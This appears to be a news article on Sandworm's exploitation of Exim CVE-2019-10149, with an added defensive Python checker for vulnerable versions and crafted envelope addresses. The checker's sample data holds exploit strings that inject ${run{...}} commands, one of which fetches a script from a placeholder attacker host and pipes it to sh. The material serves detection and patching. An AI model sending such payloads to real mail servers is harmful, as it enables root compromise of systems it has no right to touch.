The US National Security Agency (NSA) has released a new alert warning that Russian state hackers have been exploiting a vulnerability in Exim email servers for over nine months.
Exim is mail transfer agent (MTA) software developed at the University of Cambridge for Unix-based operating systems. Packaged for popular Linux distributions such as Red Hat and Debian (it is Debian's default MTA), it is thought to run on millions of email servers globally.
The NSA warned that organizations which have not yet patched CVE-2019-10149 remain exposed to the infamous Sandworm group. The flaw was publicly disclosed in June 2019; the fix had already shipped in Exim 4.92, so releases 4.87 to 4.91 are the affected ones.
“The actors exploited victims using Exim software on their public facing MTAs by sending a command in the ‘MAIL FROM’ field of an SMTP (Simple Mail Transfer Protocol) message,” the advisory stated.
“An unauthenticated remote attacker can send a specially crafted email to execute commands with root privileges allowing the attacker to install programs, modify data, and create new accounts.”
Specifically, when Sandworm exploits CVE-2019-10149, the targeted machine downloads and executes a shell script from a domain under the group's control. That script in turn attempts to add privileged users, disable network security settings, update the SSH configuration to enable additional remote access, and execute a further script to enable follow-on exploitation. The underlying flaw is an expansion injection: affected Exim versions (4.87 to 4.91) evaluate attacker-controlled text from the envelope address as an Exim expansion string, so a ${run{...}} item placed there is executed as a command with root privileges.
The NSA urged organizations to upgrade Exim to 4.93 or newer and to use network-based security appliances to detect and/or block CVE-2019-10149 exploit attempts. Since the campaign has been running for at least nine months, patching alone does not undo access already gained through the added accounts and SSH changes, so hosts that ran an affected version should also be checked for those indicators.
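A checker for the two points above, the affected version range and the crafted envelope address, written as an added example for this article (it is not code from the NSA advisory or the Exim project). It assumes the affected range 4.87 to 4.91 with the fix in 4.92 as stated in the Qualys disclosure, and that exploitation places Exim's ${run{...}} expansion item in the sender or recipient address, as public proof-of-concept code does. The SMTP lines, the mainlog line and the `exim -bV` output are constructed, and attacker.invalid is a placeholder host.

```python
import re
from typing import Dict, List, Tuple

# CVE-2019-10149 affects Exim 4.87 through 4.91 (Qualys advisory); the fix
# shipped in 4.92 and the NSA advisory recommends upgrading to 4.93 or newer.
FIXED_IN = (4, 92)
NSA_RECOMMENDED = (4, 93)


def parse_exim_version(bv_output: str) -> Tuple[int, int]:
    """Extract (major, minor) from `exim -bV` output such as
    'Exim version 4.91 #1 built 10-Feb-2019 ...'."""
    m = re.search(r"Exim version (\d+)\.(\d+)", bv_output)
    if m is None:
        raise ValueError("no 'Exim version X.Y' line found")
    return int(m.group(1)), int(m.group(2))


def assess_version(version: Tuple[int, int]) -> str:
    """Rate an Exim version against the CVE-2019-10149 fix and the NSA guidance."""
    if version < FIXED_IN:
        # 4.87-4.91 are the confirmed range; anything older is unsupported and
        # should be treated the same way.
        return "vulnerable"
    if version < NSA_RECOMMENDED:
        return "fixed, below NSA-recommended 4.93"
    return "ok"


# Places an envelope address appears in an SMTP transcript or Exim mainlog line:
# the MAIL FROM and RCPT TO commands, and Exim's F=<sender> log field.
ENVELOPE_RE = re.compile(r"(MAIL FROM|RCPT TO|F=)\s*:?\s*<([^>]*)>", re.IGNORECASE)

# The Exim expansion item that executes a command. Public proof-of-concept code
# for CVE-2019-10149 places it in the local part of an address; in normal mail
# it never appears in an envelope address, so it is a high-confidence tripwire.
RUN_RE = re.compile(r"\$\{run\{(.*?)\}\}", re.DOTALL)

# Exim expansion escapes that exploit strings use to smuggle '/', spaces and
# quotes (not allowed in a bare local part) into the command.
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\t|\\n")


def decode_exim_escapes(s: str) -> str:
    """Undo \\xHH, \\t and \\n escapes so the command reads as the shell would see it."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return "\t" if m.group(0) == "\\t" else "\n"
    return ESCAPE_RE.sub(repl, s)


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per envelope address that carries a ${run{...}} item."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, 1):
        for field in ENVELOPE_RE.finditer(line):
            name, address = field.group(1).upper(), field.group(2)
            run = RUN_RE.search(address)
            if run is None:
                continue
            findings.append({
                "line": lineno,
                "field": name,
                "address": address,
                "command": decode_exim_escapes(run.group(1)),
            })
    return findings


# Constructed sample input: two benign SMTP commands, two crafted commands
# modelled on the public proof-of-concept, and one Exim mainlog rejection line.
# attacker.invalid is a placeholder host (.invalid is reserved for this use).
SAMPLE_LINES = [
    "MAIL FROM:<alice@example.com>",
    "RCPT TO:<bob@example.net>",
    r"MAIL FROM:<${run{\x2fbin\x2fsh\t-c\t\x22curl\x20http\x3a\x2f\x2fattacker.invalid\x2fi.sh\x20|\x20sh\x22}}@example.com>",
    r"RCPT TO:<${run{\x2fbin\x2fsh\t-c\t\x22id\x22}}@localhost>",
    r"2020-05-28 10:15:02 H=(scanner) [203.0.113.7] F=<${run{\x2fusr\x2fbin\x2fid}}@localhost> rejected RCPT <root@localhost>: relay not permitted",
]

if __name__ == "__main__":
    # Version check on a constructed `exim -bV` first line; a live check would
    # pass subprocess.run(["exim", "-bV"], capture_output=True, text=True).stdout.
    ver = parse_exim_version("Exim version 4.91 #1 built 10-Feb-2019 11:13:42")
    print(f"Exim {ver[0]}.{ver[1]}: {assess_version(ver)}")
    for f in scan_lines(SAMPLE_LINES):
        print(f"line {f['line']}: {f['field']} carries ${{run{{...}}}} -> {f['command']!r}")
```

Feed `scan_lines` the mainlog (or a captured SMTP session) and `parse_exim_version` the real `exim -bV` output. The ${run{ pattern is a tripwire rather than a full detector: it catches the shape the public exploit uses, so run it alongside the version check and the network-level blocking the NSA recommends, not instead of them.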
Staffed by operatives from the Russian GRU (military intelligence) Main Center for Special Technologies (GTsST), field post number 74455, Sandworm is regarded as one of the most sophisticated state-sponsored hacking groups around.
It has been widely linked to the BlackEnergy malware used in the December 2015 attack on Ukrainian electricity distribution companies and to the follow-on attack on Kyiv's grid in December 2016 (attributed to the Industroyer malware), both of which caused outages in winter, as well as to campaigns against NATO members and European governments in 2019.